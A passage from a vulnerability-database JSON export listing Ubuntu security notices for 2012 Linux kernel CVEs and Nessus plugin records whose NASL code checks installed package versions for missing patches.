"Ubuntu", "published": "2012-09-19T00:00:00", "title": "Linux kernel (Oneiric backport) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-19T00:00:00", "id": "USN-1575-1", "href": "https://usn.ubuntu.com/1575-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:31", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-omap", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-26.42", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-26-generic-pae", "operator": "lt"}], "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-14T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-14T00:00:00", "id": "USN-1568-1", "href": "https://usn.ubuntu.com/1568-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:20", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "3.0.0-1216.28", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.0.0-1216-omap4", "operator": "lt"}], "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-21T00:00:00", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-09-21T00:00:00", "id": "USN-1578-1", "href": "https://usn.ubuntu.com/1578-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:21", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-2121", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3511"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "2.6.38-1209.26", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.38-1209-omap4", "operator": "lt"}], "description": "A flaw was discovered in the Linux kernel\u2019s KVM (kernel virtual machine). An administrative user in the guest OS could leverage this flaw to cause a denial of service in the host OS. (CVE-2012-2121)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel\u2019s memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-21T00:00:00", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-2121", "CVE-2012-3430"], "modified": "2012-09-21T00:00:00", "id": "USN-1577-1", "href": "https://usn.ubuntu.com/1577-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:58", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-6647", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0310", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-6547"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-1419.26", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-1419-omap4", "operator": "lt"}], "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nMathias Krause discovered an information leak in the Linux kernel\u2019s TUN/TAP device driver. A local user could exploit this flaw to examine part of the kernel\u2019s stack memory. (CVE-2012-6547)\n\nA flaw was discovered in the requeuing of futexes in the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) or possibly have other unspecified impact. (CVE-2012-6647)\n\nA flaw was found in Linux kernel\u2019s validation of CIPSO (Common IP Security Option) options set from userspace. A local user that can set a socket\u2019s CIPSO options could exploit this flaw to cause a denial of service (crash the system). (CVE-2013-0310)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-21T00:00:00", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-6647", "CVE-2012-6547", "CVE-2012-3412", "CVE-2013-0310", "CVE-2012-3430"], "modified": "2012-09-21T00:00:00", "id": "USN-1580-1", "href": "https://usn.ubuntu.com/1580-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:27", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-3430", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-6647", "https://people.canonical.com/~ubuntu-security/cve/CVE-2013-0310", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-6547"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-31.50", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-31-highbank", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-31.50", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-31-omap", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-31.50", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-31-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-31.50", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-31-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-31.50", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-31-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-31.50", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-31-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-31.50", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-31-powerpc64-smp", "operator": "lt"}], "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service. (CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nMathias Krause discovered an information leak in the Linux kernel\u2019s TUN/TAP device driver. A local user could exploit this flaw to examine part of the kernel\u2019s stack memory. (CVE-2012-6547)\n\nA flaw was discovered in the requeuing of futexes in the Linux kernel. A local user could exploit this flaw to cause a denial of service (system crash) or possibly have other unspecified impact. (CVE-2012-6647)\n\nA flaw was found in Linux kernel\u2019s validation of CIPSO (Common IP Security Option) options set from userspace. A local user that can set a socket\u2019s CIPSO options could exploit this flaw to cause a denial of service (crash the system). (CVE-2013-0310)", "edition": 3, "reporter": "Ubuntu", "published": "2012-09-21T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-6647", "CVE-2012-6547", "CVE-2012-3412", "CVE-2013-0310", "CVE-2012-3430"], "modified": "2012-09-21T00:00:00", "id": "USN-1579-1", "href": "https://usn.ubuntu.com/1579-1/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:47:40", "references": [], "pluginID": "62111", "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2012-09-15T00:00:00", "title": "Ubuntu 11.04 : linux vulnerabilities (USN-1567-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "cpe:/o:canonical:ubuntu_linux:11.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual"], "id": "UBUNTU_USN-1567-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1567-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62111);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/01 17:36:14\");\n\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_bugtraq_id(54365, 54702, 54763, 55151);\n script_xref(name:\"USN\", value:\"1567-1\");\n\n script_name(english:\"Ubuntu 11.04 : linux vulnerabilities (USN-1567-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in how the Linux kernel passed the replacement\nsession keyring to a child process. An unprivileged local user could\nexploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-versatile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(11\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-generic\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-generic-pae\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-server\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-versatile\", pkgver:\"2.6.38-16.67\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"linux-image-2.6.38-16-virtual\", pkgver:\"2.6.38-16.67\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-generic / linux-image-2.6-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:43:47", "references": [], "pluginID": "62211", "description": "A flaw was found in how the Linux kernel passed the replacement session keyring to a child process. An unprivileged local user could exploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2012-09-20T00:00:00", "title": "Ubuntu 10.04 LTS : linux-lts-backport-natty vulnerabilities (USN-1574-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual"], "id": "UBUNTU_USN-1574-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1574-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62211);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/01 17:36:14\");\n\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_bugtraq_id(54365, 54702, 54763, 55151);\n script_xref(name:\"USN\", value:\"1574-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-lts-backport-natty vulnerabilities (USN-1574-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in how the Linux kernel passed the replacement\nsession keyring to a child process. An unprivileged local user could\nexploit this flaw to cause a denial of service (panic).\n(CVE-2012-2745)\n\nBen Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-generic\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-generic-pae\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-server\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"linux-image-2.6.38-16-virtual\", pkgver:\"2.6.38-16.67~lucid1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-2.6-generic / linux-image-2.6-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:33:51", "references": [], "pluginID": "62200", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's memory subsystem. An unprivileged local use could exploit the flaw to cause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2012-09-19T00:00:00", "title": "Ubuntu 10.04 LTS : linux-ec2 vulnerabilities (USN-1573-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-15T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-2.6-ec2"], "id": "UBUNTU_USN-1573-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62200", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1573-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62200);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/08/15 12:24:49\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_xref(name:\"USN\", value:\"1573-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS : linux-ec2 vulnerabilities (USN-1573-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\n\nA flaw was discovered in the madvise feature of the Linux kernel's\nmemory subsystem. An unprivileged local use could exploit the flaw to\ncause a denial of service (crash the system). (CVE-2012-3511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-2.6-ec2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 